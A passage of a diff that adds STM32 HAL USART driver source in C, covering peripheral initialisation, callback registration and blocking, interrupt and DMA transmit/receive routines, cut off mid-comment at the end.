Enable the Peripheral */ + __HAL_USART_ENABLE(husart); + + /* Initialize the USART state */ + husart->ErrorCode = HAL_USART_ERROR_NONE; + husart->State = HAL_USART_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitializes the USART peripheral. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_DeInit(USART_HandleTypeDef *husart) +{ + /* Check the USART handle allocation */ + if (husart == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_USART_INSTANCE(husart->Instance)); + + husart->State = HAL_USART_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_USART_DISABLE(husart); + +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + if (husart->MspDeInitCallback == NULL) + { + husart->MspDeInitCallback = HAL_USART_MspDeInit; + } + /* DeInit the low level hardware */ + husart->MspDeInitCallback(husart); +#else + /* DeInit the low level hardware */ + HAL_USART_MspDeInit(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + + husart->ErrorCode = HAL_USART_ERROR_NONE; + husart->State = HAL_USART_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(husart); + + return HAL_OK; +} + +/** + * @brief USART MSP Init. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval None + */ +__weak void HAL_USART_MspInit(USART_HandleTypeDef *husart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(husart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_USART_MspInit could be implemented in the user file + */ +} + +/** + * @brief USART MSP DeInit. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval None + */ +__weak void HAL_USART_MspDeInit(USART_HandleTypeDef *husart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(husart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_USART_MspDeInit could be implemented in the user file + */ +} + +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User USART Callback + * To be used instead of the weak predefined callback + * @param husart usart handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_USART_TX_HALFCOMPLETE_CB_ID Tx Half Complete Callback ID + * @arg @ref HAL_USART_TX_COMPLETE_CB_ID Tx Complete Callback ID + * @arg @ref HAL_USART_RX_HALFCOMPLETE_CB_ID Rx Half Complete Callback ID + * @arg @ref HAL_USART_RX_COMPLETE_CB_ID Rx Complete Callback ID + * @arg @ref HAL_USART_TX_RX_COMPLETE_CB_ID Rx Complete Callback ID + * @arg @ref HAL_USART_ERROR_CB_ID Error Callback ID + * @arg @ref HAL_USART_ABORT_COMPLETE_CB_ID Abort Complete Callback ID + * @arg @ref HAL_USART_MSPINIT_CB_ID MspInit Callback ID + * @arg @ref HAL_USART_MSPDEINIT_CB_ID MspDeInit Callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status ++ */ +HAL_StatusTypeDef HAL_USART_RegisterCallback(USART_HandleTypeDef *husart, HAL_USART_CallbackIDTypeDef CallbackID, + pUSART_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + husart->ErrorCode |= HAL_USART_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(husart); + + if (husart->State == HAL_USART_STATE_READY) + { + switch (CallbackID) + { + case HAL_USART_TX_HALFCOMPLETE_CB_ID : + husart->TxHalfCpltCallback = pCallback; + break; + + case HAL_USART_TX_COMPLETE_CB_ID : + husart->TxCpltCallback = pCallback; + break; + + case HAL_USART_RX_HALFCOMPLETE_CB_ID : + husart->RxHalfCpltCallback = pCallback; + break; + + case HAL_USART_RX_COMPLETE_CB_ID : + husart->RxCpltCallback = pCallback; + break; + + case HAL_USART_TX_RX_COMPLETE_CB_ID : + husart->TxRxCpltCallback = pCallback; + break; + + case HAL_USART_ERROR_CB_ID : + husart->ErrorCallback = pCallback; + break; + + case HAL_USART_ABORT_COMPLETE_CB_ID : + husart->AbortCpltCallback = pCallback; + break; + + case HAL_USART_MSPINIT_CB_ID : + husart->MspInitCallback = pCallback; + break; + + case HAL_USART_MSPDEINIT_CB_ID : + husart->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + husart->ErrorCode |= HAL_USART_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (husart->State == HAL_USART_STATE_RESET) + { + switch (CallbackID) + { + case HAL_USART_MSPINIT_CB_ID : + husart->MspInitCallback = pCallback; + break; + + case HAL_USART_MSPDEINIT_CB_ID : + husart->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + husart->ErrorCode |= HAL_USART_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + husart->ErrorCode |= HAL_USART_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(husart); + + return status; +} + +/** + * @brief Unregister an USART Callback + * USART callaback is redirected to the weak predefined callback + * @param husart usart handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_USART_TX_HALFCOMPLETE_CB_ID Tx Half Complete Callback ID + * @arg @ref HAL_USART_TX_COMPLETE_CB_ID Tx Complete Callback ID + * @arg @ref HAL_USART_RX_HALFCOMPLETE_CB_ID Rx Half Complete Callback ID + * @arg @ref HAL_USART_RX_COMPLETE_CB_ID Rx Complete Callback ID + * @arg @ref HAL_USART_TX_RX_COMPLETE_CB_ID Rx Complete Callback ID + * @arg @ref HAL_USART_ERROR_CB_ID Error Callback ID + * @arg @ref HAL_USART_ABORT_COMPLETE_CB_ID Abort Complete Callback ID + * @arg @ref HAL_USART_MSPINIT_CB_ID MspInit Callback ID + * @arg @ref HAL_USART_MSPDEINIT_CB_ID MspDeInit Callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_UnRegisterCallback(USART_HandleTypeDef *husart, HAL_USART_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(husart); + + if (husart->State == HAL_USART_STATE_READY) + { + switch (CallbackID) + { + case HAL_USART_TX_HALFCOMPLETE_CB_ID : + husart->TxHalfCpltCallback = HAL_USART_TxHalfCpltCallback; /* Legacy weak TxHalfCpltCallback */ + break; + + case HAL_USART_TX_COMPLETE_CB_ID : + husart->TxCpltCallback = HAL_USART_TxCpltCallback; /* Legacy weak TxCpltCallback */ + break; + + case HAL_USART_RX_HALFCOMPLETE_CB_ID : + husart->RxHalfCpltCallback = HAL_USART_RxHalfCpltCallback; /* Legacy weak RxHalfCpltCallback */ + break; + + case HAL_USART_RX_COMPLETE_CB_ID : + husart->RxCpltCallback = HAL_USART_RxCpltCallback; /* Legacy weak RxCpltCallback */ + break; + + case HAL_USART_TX_RX_COMPLETE_CB_ID : + husart->TxRxCpltCallback = HAL_USART_TxRxCpltCallback; /* Legacy weak TxRxCpltCallback */ + break; + + case HAL_USART_ERROR_CB_ID : + husart->ErrorCallback = HAL_USART_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_USART_ABORT_COMPLETE_CB_ID : + husart->AbortCpltCallback = HAL_USART_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + break; + + case HAL_USART_MSPINIT_CB_ID : + husart->MspInitCallback = HAL_USART_MspInit; /* Legacy weak MspInitCallback */ + break; + + case HAL_USART_MSPDEINIT_CB_ID : + husart->MspDeInitCallback = HAL_USART_MspDeInit; /* Legacy weak MspDeInitCallback */ + break; + + default : + /* Update the error code */ + husart->ErrorCode |= HAL_USART_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (husart->State == HAL_USART_STATE_RESET) + { + switch (CallbackID) + { + case HAL_USART_MSPINIT_CB_ID : + husart->MspInitCallback = HAL_USART_MspInit; + break; + + case HAL_USART_MSPDEINIT_CB_ID : + husart->MspDeInitCallback = HAL_USART_MspDeInit; + break; + + default : + /* Update the error code */ + husart->ErrorCode |= HAL_USART_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + husart->ErrorCode |= HAL_USART_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(husart); + + return status; +} +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup USART_Exported_Functions_Group2 IO operation functions + * @brief USART Transmit and Receive functions + * +@verbatim + ============================================================================== + ##### IO operation functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to manage the USART synchronous + data transfers. + + [..] + The USART supports master mode only: it cannot receive or send data related to an input + clock (SCLK is always an output). + + (#) There are two modes of transfer: + (++) Blocking mode: The communication is performed in polling mode. + The HAL status of all data processing is returned by the same function + after finishing transfer. + (++) No-Blocking mode: The communication is performed using Interrupts + or DMA, These API's return the HAL status. + The end of the data processing will be indicated through the + dedicated USART IRQ when using Interrupt mode or the DMA IRQ when + using DMA mode. + The HAL_USART_TxCpltCallback(), HAL_USART_RxCpltCallback() and HAL_USART_TxRxCpltCallback() + user callbacks + will be executed respectively at the end of the transmit or Receive process + The HAL_USART_ErrorCallback() user callback will be executed when a communication + error is detected + + (#) Blocking mode APIs are : + (++) HAL_USART_Transmit() in simplex mode + (++) HAL_USART_Receive() in full duplex receive only + (++) HAL_USART_TransmitReceive() in full duplex mode + + (#) Non Blocking mode APIs with Interrupt are : + (++) HAL_USART_Transmit_IT()in simplex mode + (++) HAL_USART_Receive_IT() in full duplex receive only + (++) HAL_USART_TransmitReceive_IT() in full duplex mode + (++) HAL_USART_IRQHandler() + + (#) Non Blocking mode functions with DMA are : + (++) HAL_USART_Transmit_DMA()in simplex mode + (++) HAL_USART_Receive_DMA() in full duplex receive only + (++) HAL_USART_TransmitReceive_DMA() in full duplex mode + (++) HAL_USART_DMAPause() + (++) HAL_USART_DMAResume() + (++) HAL_USART_DMAStop() + + (#) A set of Transfer Complete Callbacks are provided in non Blocking mode: + (++) HAL_USART_TxHalfCpltCallback() + (++) HAL_USART_TxCpltCallback() + (++) HAL_USART_RxHalfCpltCallback() + (++) HAL_USART_RxCpltCallback() + (++) HAL_USART_ErrorCallback() + (++) HAL_USART_TxRxCpltCallback() + + (#) Non-Blocking mode transfers could be aborted using Abort API's : + (++) HAL_USART_Abort() + (++) HAL_USART_Abort_IT() + + (#) For Abort services based on interrupts (HAL_USART_Abort_IT), a Abort Complete Callbacks is provided: + (++) HAL_USART_AbortCpltCallback() + + (#) In Non-Blocking mode transfers, possible errors are split into 2 categories. + Errors are handled as follows : + (++) Error is considered as Recoverable and non blocking : Transfer could go till end, but error severity is + to be evaluated by user : this concerns Frame Error, Parity Error or Noise Error in Interrupt mode reception . + Received character is then retrieved and stored in Rx buffer, Error code is set to allow user to identify error type, + and HAL_USART_ErrorCallback() user callback is executed. Transfer is kept ongoing on USART side. + If user wants to abort it, Abort services should be called by user. + (++) Error is considered as Blocking : Transfer could not be completed properly and is aborted. + This concerns Overrun Error In Interrupt mode reception and all errors in DMA mode. + Error code is set to allow user to identify error type, and HAL_USART_ErrorCallback() user callback is executed. + +@endverbatim + * @{ + */ + +/** + * @brief Simplex Send an amount of data in blocking mode. + * @note When USART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the sent data is handled as a set of u16. In this case, Size must indicate the number + * of u16 provided through pTxData. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @param pTxData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be sent. + * @param Timeout Timeout duration. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_Transmit(USART_HandleTypeDef *husart, uint8_t *pTxData, uint16_t Size, uint32_t Timeout) +{ + uint8_t *ptxdata8bits; + uint16_t *ptxdata16bits; + uint32_t tickstart; + + if (husart->State == HAL_USART_STATE_READY) + { + if ((pTxData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(husart); + + husart->ErrorCode = HAL_USART_ERROR_NONE; + husart->State = HAL_USART_STATE_BUSY_TX; + + /* Init tickstart for timeout management */ + tickstart = HAL_GetTick(); + + husart->TxXferSize = Size; + husart->TxXferCount = Size; + + /* In case of 9bits/No Parity transfer, pTxData needs to be handled as a uint16_t pointer */ + if ((husart->Init.WordLength == USART_WORDLENGTH_9B) && (husart->Init.Parity == USART_PARITY_NONE)) + { + ptxdata8bits = NULL; + ptxdata16bits = (uint16_t *) pTxData; + } + else + { + ptxdata8bits = pTxData; + ptxdata16bits = NULL; + } + + while (husart->TxXferCount > 0U) + { + /* Wait for TXE flag in order to write data in DR */ + if (USART_WaitOnFlagUntilTimeout(husart, USART_FLAG_TXE, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + if (ptxdata8bits == NULL) + { + husart->Instance->DR = (uint16_t)(*ptxdata16bits & (uint16_t)0x01FF); + ptxdata16bits++; + } + else + { + husart->Instance->DR = (uint8_t)(*ptxdata8bits & (uint8_t)0xFF); + ptxdata8bits++; + } + + husart->TxXferCount--; + } + + if (USART_WaitOnFlagUntilTimeout(husart, USART_FLAG_TC, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + + husart->State = HAL_USART_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(husart); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Full-Duplex Receive an amount of data in blocking mode. + * @note To receive synchronous data, dummy data are simultaneously transmitted. + * @note When USART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the received data is handled as a set of u16. In this case, Size must indicate the number + * of u16 available through pRxData. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @param pRxData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be received. + * @param Timeout Timeout duration. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_Receive(USART_HandleTypeDef *husart, uint8_t *pRxData, uint16_t Size, uint32_t Timeout) +{ + uint8_t *prxdata8bits; + uint16_t *prxdata16bits; + uint32_t tickstart; + + if (husart->State == HAL_USART_STATE_READY) + { + if ((pRxData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + /* Process Locked */ + __HAL_LOCK(husart); + + husart->ErrorCode = HAL_USART_ERROR_NONE; + husart->State = HAL_USART_STATE_BUSY_RX; + + /* Init tickstart for timeout management */ + tickstart = HAL_GetTick(); + + husart->RxXferSize = Size; + husart->RxXferCount = Size; + + /* In case of 9bits/No Parity transfer, pRxData needs to be handled as a uint16_t pointer */ + if ((husart->Init.WordLength == USART_WORDLENGTH_9B) && (husart->Init.Parity == USART_PARITY_NONE)) + { + prxdata8bits = NULL; + prxdata16bits = (uint16_t *) pRxData; + } + else + { + prxdata8bits = pRxData; + prxdata16bits = NULL; + } + + /* Check the remain data to be received */ + while (husart->RxXferCount > 0U) + { + /* Wait until TXE flag is set to send dummy byte in order to generate the + * clock for the slave to send data. + * Whatever the frame length (7, 8 or 9-bit long), the same dummy value + * can be written for all the cases. */ + if (USART_WaitOnFlagUntilTimeout(husart, USART_FLAG_TXE, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + husart->Instance->DR = (DUMMY_DATA & (uint16_t)0x0FF); + + /* Wait until RXNE flag is set to receive the byte */ + if (USART_WaitOnFlagUntilTimeout(husart, USART_FLAG_RXNE, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + + if (prxdata8bits == NULL) + { + *prxdata16bits = (uint16_t)(husart->Instance->DR & (uint16_t)0x01FF); + prxdata16bits++; + } + else + { + if ((husart->Init.WordLength == USART_WORDLENGTH_9B) || ((husart->Init.WordLength == USART_WORDLENGTH_8B) && (husart->Init.Parity == USART_PARITY_NONE))) + { + *prxdata8bits = (uint8_t)(husart->Instance->DR & (uint8_t)0x0FF); + } + else + { + *prxdata8bits = (uint8_t)(husart->Instance->DR & (uint8_t)0x07F); + } + prxdata8bits++; + } + husart->RxXferCount--; + } + + husart->State = HAL_USART_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(husart); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Full-Duplex Send and Receive an amount of data in full-duplex mode (blocking mode). + * @note When USART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the sent data and the received data are handled as sets of u16. In this case, Size must indicate the number + * of u16 available through pTxData and through pRxData. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @param pTxData Pointer to TX data buffer (u8 or u16 data elements). + * @param pRxData Pointer to RX data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be sent (same amount to be received). + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_TransmitReceive(USART_HandleTypeDef *husart, uint8_t *pTxData, uint8_t *pRxData, + uint16_t Size, uint32_t Timeout) +{ + uint8_t *prxdata8bits; + uint16_t *prxdata16bits; + uint8_t *ptxdata8bits; + uint16_t *ptxdata16bits; + uint16_t rxdatacount; + uint32_t tickstart; + + if (husart->State == HAL_USART_STATE_READY) + { + if ((pTxData == NULL) || (pRxData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + + /* In case of 9bits/No Parity transfer, pTxData and pRxData buffers provided as input parameter + should be aligned on a u16 frontier, as data to be filled into TDR/retrieved from RDR will be + handled through a u16 cast. */ + if ((husart->Init.WordLength == USART_WORDLENGTH_9B) && (husart->Init.Parity == USART_PARITY_NONE)) + { + if (((((uint32_t)pTxData) & 1U) != 0U) || ((((uint32_t)pRxData) & 1U) != 0U)) + { + return HAL_ERROR; + } + } + /* Process Locked */ + __HAL_LOCK(husart); + + husart->ErrorCode = HAL_USART_ERROR_NONE; + husart->State = HAL_USART_STATE_BUSY_RX; + + /* Init tickstart for timeout management */ + tickstart = HAL_GetTick(); + + husart->RxXferSize = Size; + husart->TxXferSize = Size; + husart->TxXferCount = Size; + husart->RxXferCount = Size; + + /* In case of 9bits/No Parity transfer, pRxData needs to be handled as a uint16_t pointer */ + if ((husart->Init.WordLength == USART_WORDLENGTH_9B) && (husart->Init.Parity == USART_PARITY_NONE)) + { + prxdata8bits = NULL; + ptxdata8bits = NULL; + ptxdata16bits = (uint16_t *) pTxData; + prxdata16bits = (uint16_t *) pRxData; + } + else + { + prxdata8bits = pRxData; + ptxdata8bits = pTxData; + ptxdata16bits = NULL; + prxdata16bits = NULL; + } + + /* Check the remain data to be received */ + /* rxdatacount is a temporary variable for MISRAC2012-Rule-13.5 */ + rxdatacount = husart->RxXferCount; + while ((husart->TxXferCount > 0U) || (rxdatacount > 0U)) + { + if (husart->TxXferCount > 0U) + { + /* Wait for TXE flag in order to write data in DR */ + if (USART_WaitOnFlagUntilTimeout(husart, USART_FLAG_TXE, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + + if (ptxdata8bits == NULL) + { + husart->Instance->DR = (uint16_t)(*ptxdata16bits & (uint16_t)0x01FF); + ptxdata16bits++; + } + else + { + husart->Instance->DR = (uint8_t)(*ptxdata8bits & (uint8_t)0xFF); + ptxdata8bits++; + } + + husart->TxXferCount--; + } + + if (husart->RxXferCount > 0U) + { + /* Wait for RXNE Flag */ + if (USART_WaitOnFlagUntilTimeout(husart, USART_FLAG_RXNE, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + if (prxdata8bits == NULL) + { + *prxdata16bits = (uint16_t)(husart->Instance->DR & (uint16_t)0x01FF); + prxdata16bits++; + } + else + { + if ((husart->Init.WordLength == USART_WORDLENGTH_9B) || ((husart->Init.WordLength == USART_WORDLENGTH_8B) && (husart->Init.Parity == USART_PARITY_NONE))) + { + *prxdata8bits = (uint8_t)(husart->Instance->DR & (uint8_t)0x0FF); + } + else + { + *prxdata8bits = (uint8_t)(husart->Instance->DR & (uint8_t)0x07F); + } + + prxdata8bits++; + } + + husart->RxXferCount--; + } + rxdatacount = husart->RxXferCount; + } + + husart->State = HAL_USART_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(husart); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Simplex Send an amount of data in non-blocking mode. + * @note When USART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the sent data is handled as a set of u16. In this case, Size must indicate the number + * of u16 provided through pTxData. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @param pTxData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be sent. + * @retval HAL status + * @note The USART errors are not managed to avoid the overrun error. + */ +HAL_StatusTypeDef HAL_USART_Transmit_IT(USART_HandleTypeDef *husart, uint8_t *pTxData, uint16_t Size) +{ + if (husart->State == HAL_USART_STATE_READY) + { + if ((pTxData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(husart); + + husart->pTxBuffPtr = pTxData; + husart->TxXferSize = Size; + husart->TxXferCount = Size; + + husart->ErrorCode = HAL_USART_ERROR_NONE; + husart->State = HAL_USART_STATE_BUSY_TX; + + /* The USART Error Interrupts: (Frame error, Noise error, Overrun error) + are not managed by the USART transmit process to avoid the overrun interrupt + when the USART mode is configured for transmit and receive "USART_MODE_TX_RX" + to benefit for the frame error and noise interrupts the USART mode should be + configured only for transmit "USART_MODE_TX" + The __HAL_USART_ENABLE_IT(husart, USART_IT_ERR) can be used to enable the Frame error, + Noise error interrupt */ + + /* Process Unlocked */ + __HAL_UNLOCK(husart); + + /* Enable the USART Transmit Data Register Empty Interrupt */ + SET_BIT(husart->Instance->CR1, USART_CR1_TXEIE); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Simplex Receive an amount of data in non-blocking mode. + * @note To receive synchronous data, dummy data are simultaneously transmitted. + * @note When USART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the received data is handled as a set of u16. In this case, Size must indicate the number + * of u16 available through pRxData. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @param pRxData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be received. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_Receive_IT(USART_HandleTypeDef *husart, uint8_t *pRxData, uint16_t Size) +{ + if (husart->State == HAL_USART_STATE_READY) + { + if ((pRxData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + /* Process Locked */ + __HAL_LOCK(husart); + + husart->pRxBuffPtr = pRxData; + husart->RxXferSize = Size; + husart->RxXferCount = Size; + + husart->ErrorCode = HAL_USART_ERROR_NONE; + husart->State = HAL_USART_STATE_BUSY_RX; + + /* Process Unlocked */ + __HAL_UNLOCK(husart); + + /* Enable the USART Parity Error and Data Register not empty Interrupts */ + SET_BIT(husart->Instance->CR1, USART_CR1_PEIE | USART_CR1_RXNEIE); + + /* Enable the USART Error Interrupt: (Frame error, noise error, overrun error) */ + SET_BIT(husart->Instance->CR3, USART_CR3_EIE); + + /* Send dummy byte in order to generate the clock for the slave to send data */ + husart->Instance->DR = (DUMMY_DATA & (uint16_t)0x01FF); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Full-Duplex Send and Receive an amount of data in full-duplex mode (non-blocking). + * @note When USART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the sent data and the received data are handled as sets of u16. In this case, Size must indicate the number + * of u16 available through pTxData and through pRxData. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @param pTxData Pointer to TX data buffer (u8 or u16 data elements). + * @param pRxData Pointer to RX data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be sent (same amount to be received). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_TransmitReceive_IT(USART_HandleTypeDef *husart, uint8_t *pTxData, uint8_t *pRxData, + uint16_t Size) +{ + if (husart->State == HAL_USART_STATE_READY) + { + if ((pTxData == NULL) || (pRxData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + /* Process Locked */ + __HAL_LOCK(husart); + + husart->pRxBuffPtr = pRxData; + husart->RxXferSize = Size; + husart->RxXferCount = Size; + husart->pTxBuffPtr = pTxData; + husart->TxXferSize = Size; + husart->TxXferCount = Size; + + husart->ErrorCode = HAL_USART_ERROR_NONE; + husart->State = HAL_USART_STATE_BUSY_TX_RX; + + /* Process Unlocked */ + __HAL_UNLOCK(husart); + + /* Enable the USART Data Register not empty Interrupt */ + SET_BIT(husart->Instance->CR1, USART_CR1_RXNEIE); + + /* Enable the USART Parity Error Interrupt */ + SET_BIT(husart->Instance->CR1, USART_CR1_PEIE); + + /* Enable the USART Error Interrupt: (Frame error, noise error, overrun error) */ + SET_BIT(husart->Instance->CR3, USART_CR3_EIE); + + /* Enable the USART Transmit Data Register Empty Interrupt */ + SET_BIT(husart->Instance->CR1, USART_CR1_TXEIE); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Simplex Send an amount of data in DMA mode. + * @note When USART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the sent data is handled as a set of u16. In this case, Size must indicate the number + * of u16 provided through pTxData. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @param pTxData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be sent. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_Transmit_DMA(USART_HandleTypeDef *husart, uint8_t *pTxData, uint16_t Size) +{ + uint32_t *tmp; + + if (husart->State == HAL_USART_STATE_READY) + { + if ((pTxData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + /* Process Locked */ + __HAL_LOCK(husart); + + husart->pTxBuffPtr = pTxData; + husart->TxXferSize = Size; + husart->TxXferCount = Size; + + husart->ErrorCode = HAL_USART_ERROR_NONE; + husart->State = HAL_USART_STATE_BUSY_TX; + + /* Set the USART DMA transfer complete callback */ + husart->hdmatx->XferCpltCallback = USART_DMATransmitCplt; + + /* Set the USART DMA Half transfer complete callback */ + husart->hdmatx->XferHalfCpltCallback = USART_DMATxHalfCplt; + + /* Set the DMA error callback */ + husart->hdmatx->XferErrorCallback = USART_DMAError; + + /* Set the DMA abort callback */ + husart->hdmatx->XferAbortCallback = NULL; + + /* Enable the USART transmit DMA stream */ + tmp = (uint32_t *)&pTxData; + HAL_DMA_Start_IT(husart->hdmatx, *(uint32_t *)tmp, (uint32_t)&husart->Instance->DR, Size); + + /* Clear the TC flag in the SR register by writing 0 to it */ + __HAL_USART_CLEAR_FLAG(husart, USART_FLAG_TC); + + /* Process Unlocked */ + __HAL_UNLOCK(husart); + + /* Enable the DMA transfer for transmit request by setting the DMAT bit + in the USART CR3 register */ + SET_BIT(husart->Instance->CR3, USART_CR3_DMAT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Full-Duplex Receive an amount of data in DMA mode. + * @note When USART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the received data is handled as a set of u16. In this case, Size must indicate the number + * of u16 available through pRxData. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @param pRxData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be received. + * @retval HAL status + * @note The USART DMA transmit stream must be configured in order to generate the clock for the slave. + * @note When the USART parity is enabled (PCE = 1) the data received contain the parity bit. + */ +HAL_StatusTypeDef HAL_USART_Receive_DMA(USART_HandleTypeDef *husart, uint8_t *pRxData, uint16_t Size) +{ + uint32_t *tmp; + + if (husart->State == HAL_USART_STATE_READY) + { + if ((pRxData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(husart); + + husart->pRxBuffPtr = pRxData; + husart->RxXferSize = Size; + husart->pTxBuffPtr = pRxData; + husart->TxXferSize = Size; + + husart->ErrorCode = HAL_USART_ERROR_NONE; + husart->State = HAL_USART_STATE_BUSY_RX; + + /* Set the USART DMA Rx transfer complete callback */ + husart->hdmarx->XferCpltCallback = USART_DMAReceiveCplt; + + /* Set the USART DMA Half transfer complete callback */ + husart->hdmarx->XferHalfCpltCallback = USART_DMARxHalfCplt; + + /* Set the USART DMA Rx transfer error callback */ + husart->hdmarx->XferErrorCallback = USART_DMAError; + + /* Set the DMA abort callback */ + husart->hdmarx->XferAbortCallback = NULL; + + /* Set the USART Tx DMA transfer complete callback as NULL because the communication closing + is performed in DMA reception complete callback */ + husart->hdmatx->XferHalfCpltCallback = NULL; + husart->hdmatx->XferCpltCallback = NULL; + + /* Set the DMA error callback */ + husart->hdmatx->XferErrorCallback = USART_DMAError; + + /* Set the DMA AbortCpltCallback */ + husart->hdmatx->XferAbortCallback = NULL; + + /* Enable the USART receive DMA stream */ + tmp = (uint32_t *)&pRxData; + HAL_DMA_Start_IT(husart->hdmarx, (uint32_t)&husart->Instance->DR, *(uint32_t *)tmp, Size); + + /* Enable the USART transmit DMA stream: the transmit stream is used in order + to generate in the non-blocking mode the clock to the slave device, + this mode isn't a simplex receive mode but a 